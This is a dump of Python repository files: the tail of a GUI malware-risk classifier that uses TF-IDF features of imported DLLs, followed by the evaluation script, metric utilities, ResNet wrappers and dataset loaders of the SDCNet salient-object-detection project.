row_dlls = imported_dlls
row_syms = imported_syms
row_dlss_str=""
row_syms_str=""
for ele in row_dlls:
row_dlss_str += ele.lower() +" "
for ele in row_syms:
row_syms_str += ele.lower() +" "
print(row_dlss_str)
print(row_syms_str)
dll_tfidfs = dll_vec.transform([row_dlss_str, ]).toarray()[0]
dll_tfidf_pairs = []
for num, dll in enumerate(row_dlss_str.split()):
if num == 20:
break
dll_tfidf = dll_tfidfs[list(dll_vec.get_feature_names()).index(dll)]
dll_tfidf_pairs.append([dll_tfidf, list(dll_vec.get_feature_names()).index(dll)])
dll_tfidf_pairs = np.array(dll_tfidf_pairs)
# print(dll_tfidf_pairs)
dll_tfidf_pairs = dll_tfidf_pairs[dll_tfidf_pairs[:, 0].argsort()[::-1]]
for j, pair in enumerate(dll_tfidf_pairs):
name = dll_vec.get_feature_names()[int(pair[1])]
if name in scrape_dict:
n_x_test[i, 3 * j] = scrape_dict[name][0]
n_x_test[i, 3 * j + 1] = scrape_dict[name][1]
n_x_test[i, 3 * j + 2] = pair[0]
else:
n_x_test[i, 3 * j] = 1
n_x_test[i, 3 * j + 1] = 4
n_x_test[i, 3 * j + 2] = pair[0]
# print(ip1_train)
sym_tfidf = sym_vec.transform([row_syms_str, ]).toarray()[0]
sym_tfidf = sorted(sym_tfidf, reverse=True)[:50]
ip2_train = np.append(x_test[i], sym_tfidf)
n_x_test[i, 60:] = ip2_train
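# the stored training-set mean/variance standardize the feature vector before prediction;
# the added 0.069 is presumably a small constant to avoid division by zero (assumption)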
num = model.predict((n_x_test - self.mean) / (self.var ** 0.5 + 0.069))
print("NUM" + str(num))
if num >= 0 and num <= 0.3:
y = "Low"
z = "Good to use"
elif num > 0.3 and num <= 0.6:
y = "Medium"
z = "Can be used"
elif num > 0.6 and num <= 1:
y = "High"
z = "Avoid Using"
else:
y = "Out of range"
z = "Cant determine"
self.label.config(text="Recommendation : " + y)
self.label = ttk.Label(self.labelFrame, text="")
self.label.grid(column=1, row=3)
self.label.config(text=z)
df = pd.read_csv("brazilian-malware.csv")
df = df.drop(columns=["Identify", "SHA1", "FirstSeenDate"])
idll = df.loc[:, "ImportedDlls"]
idll = set(idll)
dlls = set()
for row in idll:
for dll in row.split():
dlls.add(dll)
isyms = df.loc[:, "ImportedSymbols"]
isyms = set(isyms)
syms = set()
for row in isyms:
for dll in row.split():
syms.add(dll)
df_temp = df.drop(columns=["ImportedDlls", "ImportedSymbols"])
x_train = np.array(df_temp.drop(columns=["Label"]).iloc[:40001, :])
y_train = np.array(df_temp.iloc[:40001, :].loc[:, "Label"])
x_test = np.array(df_temp.drop(columns=["Label"]).iloc[40001:, :])
y_test = np.array(df_temp.iloc[40001:, :].loc[:, "Label"])
from sklearn.feature_extraction.text import TfidfVectorizer
dll_vec = TfidfVectorizer(smooth_idf=False, analyzer="word", tokenizer=lambda x: x.split())
x = dll_vec.fit_transform(list(df.loc[:, "ImportedDlls"]))
sym_vec = TfidfVectorizer(smooth_idf=False, analyzer="word", tokenizer=lambda x: x.split())
x = sym_vec.fit_transform(list(df.loc[:, "ImportedSymbols"]))
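# note: both vectorizers are fit on the whitespace-separated DLL/symbol strings of the full CSV;
# Root.fileDialog later reuses them to transform the single analysed sample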
df_scrape = pd.read_csv("spithack1.csv").drop(['Description'], axis=1)
np_scrape = df_scrape.values
scrape_dict = {}
for i, row in enumerate(np_scrape):
if not row[1] == "-1":
name = row[0].replace("_dll", ".dll")
pop = -1
if "Very Low" in row[1]:
pop = 1
if "Low" in row[1]:
pop = 2
if "Medium" in row[1]:
pop = 3
if "High" in row[1]:
pop = 4
if "Very High" in row[1]:
pop = 5
if pop == -1:
print("err", row[1])
exp = row[2].replace(",", "")
scrape_dict[name] = [pop, int(exp)]
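# illustrative example (hypothetical values): scrape_dict maps a DLL name to
# [popularity class 1-5, usage count], e.g. scrape_dict['kernel32.dll'] -> [5, 12000]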
model = load_model('acc_97_44.h5')
|
Python
| 386
| 35.992229
| 107
|
/python/test_python3_cli.py~
| 0.655182
| 0.439846
|
Sssssbo/SDCNet
|
refs/heads/master
|
import numpy as np
import os
import torch
import torch.nn.functional as F
from PIL import Image
from torch.autograd import Variable
from torchvision import transforms
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import pandas as pd
from tqdm import tqdm
from misc import check_mkdir, AvgMeter, cal_precision_recall_mae, cal_fmeasure, cal_sizec, cal_sc
from datasets import TestFolder_joint
import joint_transforms
from model import R3Net, SDCNet
torch.manual_seed(2021)
# set which gpu to use
torch.cuda.set_device(6)
# the following two variables specify the location of the trained model file (.pth extension)
# you should have the .pth file in the folder './$ckpt_path$/$exp_name$'
ckpt_path = './ckpt'
exp_name = 'SDCNet'
msra10k_path = './SOD_label/label_msra10k.csv'
ecssd_path = './SOD_label/label_ECSSD.csv'
dutomrom_path = './SOD_label/label_DUT-OMROM.csv'
dutste_path = './SOD_label/label_DUTS-TE.csv'
hkuis_path = './SOD_label/label_HKU-IS.csv'
pascals_path = './SOD_label/label_PASCAL-S.csv'
sed2_path = './SOD_label/label_SED2.csv'
socval_path = './SOD_label/label_SOC-Val.csv'
sod_path = './SOD_label/label_SOD.csv'
thur15k_path = './SOD_label/label_THUR-15K.csv'
args = {
'snapshot': '30000', # your snapshot filename (exclude extension name)
'save_results': True, # whether to save the resulting masks
'test_mode': 1
}
joint_transform = joint_transforms.Compose([
#joint_transforms.RandomCrop(300),
#joint_transforms.RandomHorizontallyFlip(),
#joint_transforms.RandomRotate(10)
])
img_transform = transforms.Compose([
transforms.Resize((300, 300)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
target_transform = transforms.ToTensor()
to_pil = transforms.ToPILImage()
to_test ={'ECSSD': ecssd_path,'SOD': sod_path, 'DUTS-TE': dutste_path} #{'DUTS-TE': dutste_path,'ECSSD': ecssd_path,'SOD': sod_path, 'SED2': sed2_path, 'PASCAL-S': pascals_path, 'HKU-IS': hkuis_path, 'DUT-OMROM': dutomrom_path}
def main():
net = SDCNet(num_classes = 5).cuda()
print('load snapshot \'%s\' for testing, mode:\'%s\'' % (args['snapshot'], args['test_mode']))
print(exp_name)
net.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '.pth')))
net.eval()
results = {}
with torch.no_grad():
for name, root in to_test.items():
print('load snapshot \'%s\' for testing %s' %(args['snapshot'], name))
test_data = pd.read_csv(root)
test_set = TestFolder_joint(test_data, joint_transform, img_transform, target_transform)
test_loader = DataLoader(test_set, batch_size=1, num_workers=0, shuffle=False)
precision0_record, recall0_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision1_record, recall1_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision2_record, recall2_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision3_record, recall3_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision4_record, recall4_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision5_record, recall5_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision6_record, recall6_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
mae0_record = AvgMeter()
mae1_record = AvgMeter()
mae2_record = AvgMeter()
mae3_record = AvgMeter()
mae4_record = AvgMeter()
mae5_record = AvgMeter()
mae6_record = AvgMeter()
n0, n1, n2, n3, n4, n5 = 0, 0, 0, 0, 0, 0
if args['save_results']:
check_mkdir(os.path.join(ckpt_path, exp_name, '%s_%s' % (name, args['snapshot'])))
for i, (inputs, gt, labels, img_path) in enumerate(tqdm(test_loader)):
shape = gt.size()[2:]
img_var = Variable(inputs).cuda()
img = np.array(to_pil(img_var.data.squeeze(0).cpu()))
gt = np.array(to_pil(gt.data.squeeze(0).cpu()))
sizec = labels.numpy()
pred2021 = net(img_var, sizec)
pred2021 = F.interpolate(pred2021, size=shape, mode='bilinear', align_corners=True)
pred2021 = np.array(to_pil(pred2021.data.squeeze(0).cpu()))
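# accumulate precision/recall/MAE separately for each of the five object-size classes
# (labels 0-4) and jointly over all samples (the *_6 records below)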
if labels == 0:
precision1, recall1, mae1 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision1, recall1)):
p, r = pdata
precision1_record[pidx].update(p)
#print('Precision:', p, 'Recall:', r)
recall1_record[pidx].update(r)
mae1_record.update(mae1)
n1 += 1
elif labels == 1:
precision2, recall2, mae2 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision2, recall2)):
p, r = pdata
precision2_record[pidx].update(p)
#print('Precision:', p, 'Recall:', r)
recall2_record[pidx].update(r)
mae2_record.update(mae2)
n2 += 1
elif labels == 2:
precision3, recall3, mae3 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision3, recall3)):
p, r = pdata
precision3_record[pidx].update(p)
#print('Precision:', p, 'Recall:', r)
recall3_record[pidx].update(r)
mae3_record.update(mae3)
n3 += 1
elif labels == 3:
precision4, recall4, mae4 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision4, recall4)):
p, r = pdata
precision4_record[pidx].update(p)
#print('Precision:', p, 'Recall:', r)
recall4_record[pidx].update(r)
mae4_record.update(mae4)
n4 += 1
elif labels == 4:
precision5, recall5, mae5 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision5, recall5)):
p, r = pdata
precision5_record[pidx].update(p)
#print('Precision:', p, 'Recall:', r)
recall5_record[pidx].update(r)
mae5_record.update(mae5)
n5 += 1
precision6, recall6, mae6 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision6, recall6)):
p, r = pdata
precision6_record[pidx].update(p)
recall6_record[pidx].update(r)
mae6_record.update(mae6)
img_name = os.path.split(str(img_path))[1]
img_name = os.path.splitext(img_name)[0]
n0 += 1
if args['save_results']:
Image.fromarray(pred2021).save(os.path.join(ckpt_path, exp_name, '%s_%s' % (
name, args['snapshot']), img_name + '_2021.png'))
fmeasure1 = cal_fmeasure([precord.avg for precord in precision1_record],
[rrecord.avg for rrecord in recall1_record])
fmeasure2 = cal_fmeasure([precord.avg for precord in precision2_record],
[rrecord.avg for rrecord in recall2_record])
fmeasure3 = cal_fmeasure([precord.avg for precord in precision3_record],
[rrecord.avg for rrecord in recall3_record])
fmeasure4 = cal_fmeasure([precord.avg for precord in precision4_record],
[rrecord.avg for rrecord in recall4_record])
fmeasure5 = cal_fmeasure([precord.avg for precord in precision5_record],
[rrecord.avg for rrecord in recall5_record])
fmeasure6 = cal_fmeasure([precord.avg for precord in precision6_record],
[rrecord.avg for rrecord in recall6_record])
results[name] = {'fmeasure1': fmeasure1, 'mae1': mae1_record.avg,'fmeasure2': fmeasure2,
'mae2': mae2_record.avg, 'fmeasure3': fmeasure3, 'mae3': mae3_record.avg,
'fmeasure4': fmeasure4, 'mae4': mae4_record.avg, 'fmeasure5': fmeasure5,
'mae5': mae5_record.avg, 'fmeasure6': fmeasure6, 'mae6': mae6_record.avg}
print('test results:')
print('[fmeasure1 %.3f], [mae1 %.4f], [class1 %.0f]\n'\
'[fmeasure2 %.3f], [mae2 %.4f], [class2 %.0f]\n'\
'[fmeasure3 %.3f], [mae3 %.4f], [class3 %.0f]\n'\
'[fmeasure4 %.3f], [mae4 %.4f], [class4 %.0f]\n'\
'[fmeasure5 %.3f], [mae5 %.4f], [class5 %.0f]\n'\
'[fmeasure6 %.3f], [mae6 %.4f], [all %.0f]\n'%\
(fmeasure1, mae1_record.avg, n1, fmeasure2, mae2_record.avg, n2, fmeasure3, mae3_record.avg, n3, fmeasure4, mae4_record.avg, n4, fmeasure5, mae5_record.avg, n5, fmeasure6, mae6_record.avg, n0))
def accuracy(y_pred, y_actual, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
final_acc = 0
maxk = max(topk)
# for prob_threshold in np.arange(0, 1, 0.01):
PRED_COUNT = y_actual.size(0)
PRED_CORRECT_COUNT = 0
prob, pred = y_pred.topk(maxk, 1, True, True)
# prob = np.where(prob > prob_threshold, prob, 0)
for j in range(pred.size(0)):
if int(y_actual[j]) == int(pred[j]):
PRED_CORRECT_COUNT += 1
if PRED_COUNT == 0:
final_acc = 0
else:
final_acc = float(PRED_CORRECT_COUNT / PRED_COUNT)
return final_acc * 100, PRED_COUNT
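# illustrative usage (assuming y_pred is an (N, C) score tensor and y_actual an (N,) label tensor):
# acc, n = accuracy(y_pred, y_actual, topk=(1,)) # returns top-1 accuracy in percent and the sample count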
if __name__ == '__main__':
main()
|
Python
| 226
| 45.637169
| 227
|
/infer_SDCNet.py
| 0.54592
| 0.509962
|
Sssssbo/SDCNet
|
refs/heads/master
|
from .resnext101 import ResNeXt101
|
Python
| 1
| 34
| 34
|
/resnext/__init__.py
| 0.857143
| 0.685714
|
Sssssbo/SDCNet
|
refs/heads/master
|
import numpy as np
import os
import pylab as pl
#import pydensecrf.densecrf as dcrf
class AvgMeter(object):
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def check_mkdir(dir_name):
if not os.path.exists(dir_name):
os.mkdir(dir_name)
def cal_precision_recall_mae(prediction, gt):
# input should be np array with data type uint8
assert prediction.dtype == np.uint8
assert gt.dtype == np.uint8
assert prediction.shape == gt.shape
eps = 1e-4
prediction = prediction / 255.
gt = gt / 255.
mae = np.mean(np.abs(prediction - gt))
hard_gt = np.zeros(prediction.shape)
hard_gt[gt > 0.5] = 1
t = np.sum(hard_gt) # t is the number of foreground (value 1) pixels in the ground truth
precision, recall, TPR, FP = [], [], [], []
# calculating precision and recall at 256 different binarization thresholds
for threshold in range(256):
threshold = threshold / 255.
hard_prediction = np.zeros(prediction.shape)
hard_prediction[prediction > threshold] = 1
#false_pred = np.zeros(prediction.shape)
#false_prediction[prediction < threshold] = 1
a = prediction.shape
tp = np.sum(hard_prediction * hard_gt)
p = np.sum(hard_prediction)
#for roc
#fp = np.sum(false_pred * hard_gt)
#tpr = (tp + eps)/(a + eps)
fp = p - tp
#TPR.append(tpr)
FP.append(fp)
precision.append((tp + eps) / (p + eps))
recall.append((tp + eps) / (t + eps))
return precision, recall, mae#, TPR, FP
def cal_fmeasure(precision, recall):
assert len(precision) == 256
assert len(recall) == 256
beta_square = 0.3
max_fmeasure = max([(1 + beta_square) * p * r / (beta_square * p + r) for p, r in zip(precision, recall)])
return max_fmeasure
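# illustrative usage (assuming pred and gt are uint8 arrays of the same shape):
# precision, recall, mae = cal_precision_recall_mae(pred, gt)
# fmeasure = cal_fmeasure(precision, recall)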
def cal_sizec(prediction, gt):
# input should be np array with data type uint8
assert prediction.dtype == np.uint8
assert gt.dtype == np.uint8
assert prediction.shape == gt.shape
eps = 1e-4
#print(gt.shape)
prediction = prediction / 255.
gt = gt / 255.
hard_gt = np.zeros(prediction.shape)
hard_gt[gt > 0.5] = 1
t = np.sum(hard_gt) # t is the number of foreground (value 1) pixels in the ground truth
precision, recall, TPR, FP = [], [], [], []
# calculating precision and recall at 256 different binarization thresholds
best_threshold = 0
best_F = 0
for threshold in range(256):
threshold = threshold / 255.
gt_size = np.ones(prediction.shape)
a = np.sum(gt_size)
hard_prediction = np.zeros(prediction.shape)
hard_prediction[prediction > threshold] = 1
tp = np.sum(hard_prediction * hard_gt)
p = np.sum(hard_prediction)
#print(a, p)
precision = (tp + eps) / (p + eps)
recall = (tp + eps) / (t + eps)
beta_square = 0.3
fmeasure = (1 + beta_square) * precision * recall / (beta_square * precision + recall)
if fmeasure > best_F:
best_threshold = threshold*255
best_F = fmeasure
sm_size = p / a
if 0 <= sm_size < 0.1:
sizec = 0
elif 0.1 <= sm_size < 0.2:
sizec = 1
elif 0.2 <= sm_size < 0.3:
sizec = 2
elif 0.3 <= sm_size < 0.4:
sizec = 3
elif 0.4 <= sm_size <= 1.0:
sizec = 4
return sizec, best_threshold#, TPR, FP
def cal_sc(gt):
# input should be np array with data type uint8
assert gt.dtype == np.uint8
eps = 1e-4
gt = gt / 255.
#print(gt.shape)
img_size = np.ones(gt.shape)
a = np.sum(img_size)
hard_gt = np.zeros(gt.shape)
hard_gt[gt > 0.5] = 1
p = np.sum(hard_gt)
b = np.sum(gt)
sm_size = float(p) / float(a)
#print(p, a, sm_size, b)
#print(gt)
if 0 <= sm_size < 0.1:
sizec = 0
elif 0.1 <= sm_size < 0.2:
sizec = 1
elif 0.2 <= sm_size < 0.3:
sizec = 2
elif 0.3 <= sm_size < 0.4:
sizec = 3
elif 0.4 <= sm_size <= 1.0:
sizec = 4
return sizec
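# example: a ground-truth mask whose foreground covers 25% of the image gives sm_size = 0.25,
# which falls in the [0.2, 0.3) bucket and therefore returns sizec = 2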
def pr_cruve(precision, recall):
assert len(precision) == 256
assert len(recall) == 256
r = [a[1] for a in zip(precision, recall)]
p = [a[0] for a in zip(precision, recall)]
pl.title('PR curve')
pl.xlabel('Recall')
pl.ylabel('Precision')
pl.plot(r, p)
pl.show()
# determines the size type of the salient object
def size_aware(gt):
assert gt.dtype == np.uint8
eps = 1e-4
gt = gt / 255.
hard_gt = np.zeros(gt.shape)
hard_gt[gt > 0.5] = 1
t = np.sum(hard_gt)
pic = np.size(hard_gt)
rate = t/pic
return rate
# # codes of this function are borrowed from https://github.com/Andrew-Qibin/dss_crf
# def crf_refine(img, annos):
# def _sigmoid(x):
# return 1 / (1 + np.exp(-x))
# assert img.dtype == np.uint8
# assert annos.dtype == np.uint8
# assert img.shape[:2] == annos.shape
# # img and annos should be np array with data type uint8
# EPSILON = 1e-8
# M = 2 # salient or not
# tau = 1.05
# # Setup the CRF model
# d = dcrf.DenseCRF2D(img.shape[1], img.shape[0], M)
# anno_norm = annos / 255.
# n_energy = -np.log((1.0 - anno_norm + EPSILON)) / (tau * _sigmoid(1 - anno_norm))
# p_energy = -np.log(anno_norm + EPSILON) / (tau * _sigmoid(anno_norm))
# U = np.zeros((M, img.shape[0] * img.shape[1]), dtype='float32')
# U[0, :] = n_energy.flatten()
# U[1, :] = p_energy.flatten()
# d.setUnaryEnergy(U)
# d.addPairwiseGaussian(sxy=3, compat=3)
# d.addPairwiseBilateral(sxy=60, srgb=5, rgbim=img, compat=5)
# # Do the inference
# infer = np.array(d.inference(1)).astype('float32')
# res = infer[1, :]
# res = res * 255
# res = res.reshape(img.shape[:2])
# return res.astype('uint8')
|
Python
| 227
| 25.356829
| 110
|
/misc.py
| 0.56343
| 0.531673
|
Sssssbo/SDCNet
|
refs/heads/master
|
from .make_model import ResNet50, ResNet50_BIN, ResNet50_LowIN
|
Python
| 1
| 62
| 62
|
/resnet/__init__.py
| 0.822581
| 0.725806
|
Sssssbo/SDCNet
|
refs/heads/master
|
from .resnet import ResNet, ResNet_LowIN, BasicBlock, Bottleneck, IN_Bottleneck  # ResNet_LowIN and IN_Bottleneck are used below; assumed to be defined in .resnet (they were not imported in the original)
import torch
from torch import nn
from .config import resnet50_path
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
class ResNet50(nn.Module):
def __init__(self):
super(ResNet50, self).__init__()
net = ResNet(last_stride=2,
block=Bottleneck, frozen_stages=False,
layers=[3, 4, 6, 3])
net.load_param(resnet50_path)
self.layer0 = net.layer0
self.layer1 = net.layer1
self.layer2 = net.layer2
self.layer3 = net.layer3
self.layer4 = net.layer4
def forward(self, x):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
return layer4
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
class ResNet50_BIN(nn.Module):
def __init__(self):
super(ResNet50_BIN, self).__init__()
net = ResNet(last_stride=2,
block=IN_Bottleneck, frozen_stages=False,
layers=[3, 4, 6, 3])
net.load_param(resnet50_path)
self.layer0 = net.layer0
self.layer1 = net.layer1
self.layer2 = net.layer2
self.layer3 = net.layer3
self.layer4 = net.layer4
def forward(self, x):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
return layer4
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
class ResNet50_LowIN(nn.Module):
def __init__(self):
super(ResNet50_LowIN, self).__init__()
net = ResNet_LowIN(last_stride=2,
block=Bottleneck, frozen_stages=False,
layers=[3, 4, 6, 3])
net.load_param(resnet50_path)
self.layer0 = net.layer0
self.layer1 = net.layer1
self.layer2 = net.layer2
self.layer3 = net.layer3
self.layer4 = net.layer4
def forward(self, x):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
return layer4
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
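# minimal usage sketch (illustrative, assuming resnet50_path points to the ImageNet weights):
# net = ResNet50()
# feat = net(torch.rand(1, 3, 300, 300)) # returns the layer4 feature map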
|
Python
| 104
| 32.740383
| 78
|
/resnet/make_model.py
| 0.586492
| 0.54175
|
Sssssbo/SDCNet
|
refs/heads/master
|
import os
import os.path
import torch.utils.data as data
from PIL import Image
class ImageFolder_joint(data.Dataset):
# image and gt should be in the same folder and share the same filename, differing only in extension (.jpg for images, .png for ground truth)
def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None):
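# label_list is expected to be a pandas DataFrame with 'img_path', 'gt_path' and 'label' columns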
imgs = []
self.label_list = label_list
for index, row in label_list.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
self.imgs = imgs
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __len__(self):
return len(self.label_list)
def __getitem__(self, index):
img_path, gt_path, label = self.imgs[index]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
if self.joint_transform is not None:
img, target = self.joint_transform(img, target)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target, label
class ImageFolder_joint_for_edge(data.Dataset):
# image and gt should be in the same folder and share the same filename, differing only in extension (.jpg for images, .png for ground truth)
def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None):
imgs = []
for index, row in label_list.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
self.imgs = imgs
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __getitem__(self, index):
img_path, gt_path, label = self.imgs[index]
edge_path = "."+gt_path.split(".")[1]+"_edge."+gt_path.split(".")[2]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
target_edge = Image.open(edge_path).convert('L')
if self.joint_transform is not None:
if img.size != target.size or img.size != target_edge.size:
print("error path:", img_path, gt_path)
print("size:", img.size, target.size, target_edge.size)
img, target, target_edge = self.joint_transform(img, target, target_edge)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
target_edge = self.target_transform(target_edge)
return img, target, target_edge, label
def __len__(self):
return len(self.imgs)
class TestFolder_joint(data.Dataset):
# image and gt should be in the same folder and share the same filename, differing only in extension (.jpg for images, .png for ground truth)
def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None):
imgs = []
for index, row in label_list.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
self.imgs = imgs
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __getitem__(self, index):
img_path, gt_path, label = self.imgs[index]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
if self.joint_transform is not None:
img, target = self.joint_transform(img, target)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target, label, img_path
def __len__(self):
return len(self.imgs)
def make_dataset(root):
img_list = [os.path.splitext(f)[0] for f in os.listdir(root) if f.endswith('.jpg')]
return [(os.path.join(root, img_name + '.jpg'), os.path.join(root, img_name + '.png')) for img_name in img_list]
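# example: make_dataset('./data') -> [('./data/0001.jpg', './data/0001.png'), ...] (illustrative filenames)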
class ImageFolder(data.Dataset):
# image and gt should be in the same folder and share the same filename, differing only in extension (.jpg for images, .png for ground truth)
def __init__(self, root, joint_transform=None, transform=None, target_transform=None):
self.root = root
self.imgs = make_dataset(root)
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __getitem__(self, index):
img_path, gt_path = self.imgs[index]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
if self.joint_transform is not None:
img, target = self.joint_transform(img, target)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.imgs)
|
Python
| 125
| 39.872002
| 118
|
/datasets.py
| 0.623214
| 0.622627
|
Sssssbo/SDCNet
|
refs/heads/master
|
import torch
import torch.nn as nn
from .backbones.resnet import ResNet, Comb_ResNet, Pure_ResNet, Jointin_ResNet, Jointout_ResNet, BasicBlock, Bottleneck, GDN_Bottleneck, IN_Bottleneck, IN2_Bottleneck, SNR_Bottleneck, SNR2_Bottleneck, SNR3_Bottleneck
from loss.arcface import ArcFace
from .backbones.resnet_ibn_a import resnet50_ibn_a, resnet101_ibn_a
from .backbones.se_resnet_ibn_a import se_resnet50_ibn_a, se_resnet101_ibn_a
import torch.nn.functional as F
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
def weights_init_kaiming(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_out')
nn.init.constant_(m.bias, 0.0)
elif classname.find('Conv') != -1:
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in')
if m.bias is not None:
nn.init.constant_(m.bias, 0.0)
elif classname.find('BatchNorm') != -1:
if m.affine:
nn.init.constant_(m.weight, 1.0)
nn.init.constant_(m.bias, 0.0)
def weights_init_classifier(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
nn.init.normal_(m.weight, std=0.001)
if m.bias is not None:
nn.init.constant_(m.bias, 0.0)
class Backbone(nn.Module):
def __init__(self, num_classes, cfg):
super(Backbone, self).__init__()
last_stride = cfg.MODEL.LAST_STRIDE
model_path = cfg.MODEL.PRETRAIN_PATH
model_name = cfg.MODEL.NAME
self.model_name = cfg.MODEL.NAME
pretrain_choice = cfg.MODEL.PRETRAIN_CHOICE
#block = cfg.MODEL.BLOCK
self.cos_layer = cfg.MODEL.COS_LAYER
self.neck = cfg.MODEL.NECK
self.neck_feat = cfg.TEST.NECK_FEAT
if model_name == 'Pure_resnet50_GDN':
self.in_planes = 2048
self.base = ResNet(last_stride=last_stride,
block=GDN_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Comb_resnet50_IN':
self.in_planes = 2048
self.base = Comb_ResNet(last_stride=last_stride,
block=IN_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Pure_resnet50_IN2':
self.in_planes = 2048
self.base = Pure_ResNet(last_stride=last_stride,
block=IN2_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
elif model_name == 'Pure_resnet50_IN':
self.in_planes = 2048
self.base = Pure_ResNet(last_stride=last_stride,
block=IN_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Pure_resnet50_SNR':
self.in_planes = 2048
self.base = Pure_ResNet(last_stride=last_stride,
block=SNR_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Pure_resnet50_SNR2':
self.in_planes = 2048
self.base = Pure_ResNet(last_stride=last_stride,
block=SNR2_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Jointin_resnet50_SNR3':
self.in_planes = 2048
self.base = Jointin_ResNet(last_stride=last_stride,
block=SNR3_Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Jointout_resnet50_None':
self.in_planes = 2048
self.base = Jointout_ResNet(last_stride=last_stride,
block=Bottleneck, frozen_stages=cfg.MODEL.FROZEN,
layers=[3, 4, 6, 3]) #
print('using resnet50 as a backbone')
print(self.base)
elif model_name == 'Jointout_resnet50_IN':
